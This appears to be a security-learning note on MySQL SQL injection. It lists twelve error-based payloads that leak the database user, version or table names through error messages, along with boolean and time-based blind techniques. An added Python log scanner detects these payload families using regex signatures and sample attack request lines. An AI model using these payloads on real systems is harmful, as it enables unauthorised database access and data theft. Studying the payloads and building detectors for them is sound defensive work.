Day 16 (Query Methods and Error-Based Blind Injection)
When performing SQL injection, many injections produce no echoed output. One reason for the missing output can be the way the SQL statement is queried; in that case we need to fall back on error-based or blind injection for the subsequent steps. Also, when injecting manually, knowing or predicting roughly how the SQL statement is written in advance helps us choose the appropriate injection statement.
Simply put: if the page does not return error messages, we find a way to make it return them.
In GET requests, if a space is added to the URL in Burp Suite, the space is represented by a plus sign (+).
The resulting error message is displayed in the page source.
SQL injection: error-based and blind injection (twelve error-based methods)
- Error-based blind injection (error message echoed back) (first choice)
  - floor
    and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
  - updatexml
    and 1=(updatexml(1,concat(0x3a,(select user())),1))
  - extractvalue
    and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))
  - NAME_CONST
    and exists(select * from (select * from (select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
  - join
    select * from (select * from mysql.user a join mysql.user b)c;
  - exp
    and exp(~(select * from (select user())a))
  - GeometryCollection()
    and GeometryCollection((select * from (select user())a)b)
  - polygon()
    and polygon((select * from (select user())a)b)
  - multipoint()
    and multipoint((select * from (select user())a)b)
  - multilinestring()
    and multilinestring((select * from (select user())a)b)
  - multipolygon()
    and multipolygon((select * from (select user())a)b)
  - linestring()
    and linestring((select * from (select user())a)b)
- Boolean blind injection (logical judgement) (second choice)
  - regexp
  - like
  - ascii
    ascii() returns the character's code (0-127); the usable range runs from 32 to 127
  - left
    left(obj,num) returns the leftmost num characters of obj
  - ord
  - mid
- Time-based blind injection (delay judgement) (last choice)
  - if
    Syntax: select if(Condition,A,B)
    Returns A if Condition is true, otherwise B
  - sleep
    Syntax: sleep(5)
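As a defender-side companion to the three families above (the error-based functions, the boolean functions and the time-based if/sleep pair), here is an added Python example, not part of the original notes, that decodes GET parameters the way the server does (including the "+" for space noted above) and reports which family each request parameter matches; the pattern set, the request-line format and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import unquote_plus
# Signatures for the three blind-injection families above (constructed starting point, not a full WAF ruleset).
SIGNATURES = {
    "error-based": [
        r"\bfloor\s*\(\s*rand\s*\(",             # floor(rand(0)*2) duplicate-key error
        r"\b(updatexml|extractvalue)\s*\(",      # XPath syntax error carries the data
        r"\bname_const\s*\(",                    # duplicate column name error
        r"\bexp\s*\(\s*~",                       # DOUBLE value out of range
        r"\b(geometrycollection|polygon|multipoint|multilinestring|multipolygon|linestring)\s*\(",
    ],
    "boolean-based": [
        r"\b(ascii|ord|left|mid|substr(ing)?)\s*\(",  # character-by-character tests
        r"\b(and|or)\b.*\b(like|regexp|rlike)\b",     # pattern tests behind and/or
    ],
    "time-based": [r"\b(sleep|benchmark)\s*\("],      # delay oracle, usually inside if()
}
COMPILED = {f: [re.compile(p, re.I) for p in ps] for f, ps in SIGNATURES.items()}

def normalize(raw):
    """Decode as the server will ('+' and %xx), twice for double encoding, then collapse spaces."""
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(raw)))

def classify(raw):
    """Set of families whose signatures appear in one parameter value."""
    text = normalize(raw)
    return {f for f, ps in COMPILED.items() if any(p.search(text) for p in ps)}

def scan_request_line(line):
    """Parse 'METHOD /path?a=1&b=2 HTTP/1.1'; map each suspicious parameter to its families."""
    parts = line.split(" ", 2)
    query = parts[1].partition("?")[2] if len(parts) > 1 else ""
    hits = {}
    for part in query.split("&"):
        name, _, raw = part.partition("=")
        fams = classify(raw)
        if fams:
            hits[name] = sorted(fams)
    return hits

def scan_log(lines):
    """[(request target, hits)] for every log line with at least one match."""
    return [(line.split(" ", 2)[1], h) for line in lines if (h := scan_request_line(line))]

SAMPLE = [  # constructed access-log request lines, not real traffic
    "GET /item.php?id=1+and+1=(updatexml(1,concat(0x3a,(select+user())),1)) HTTP/1.1",
    "GET /item.php?id=1'+and+ascii(mid((select+user()),1,1))>96--+ HTTP/1.1",
    "GET /item.php?id=1+and+if(1=1,sleep(5),0) HTTP/1.1",
    "GET /item.php?id=42&sort=name HTTP/1.1",
]
```

The second decode pass catches double-encoded payloads at the cost of turning a literal "%2B" into a space, so keep the raw value alongside the hit when alerting.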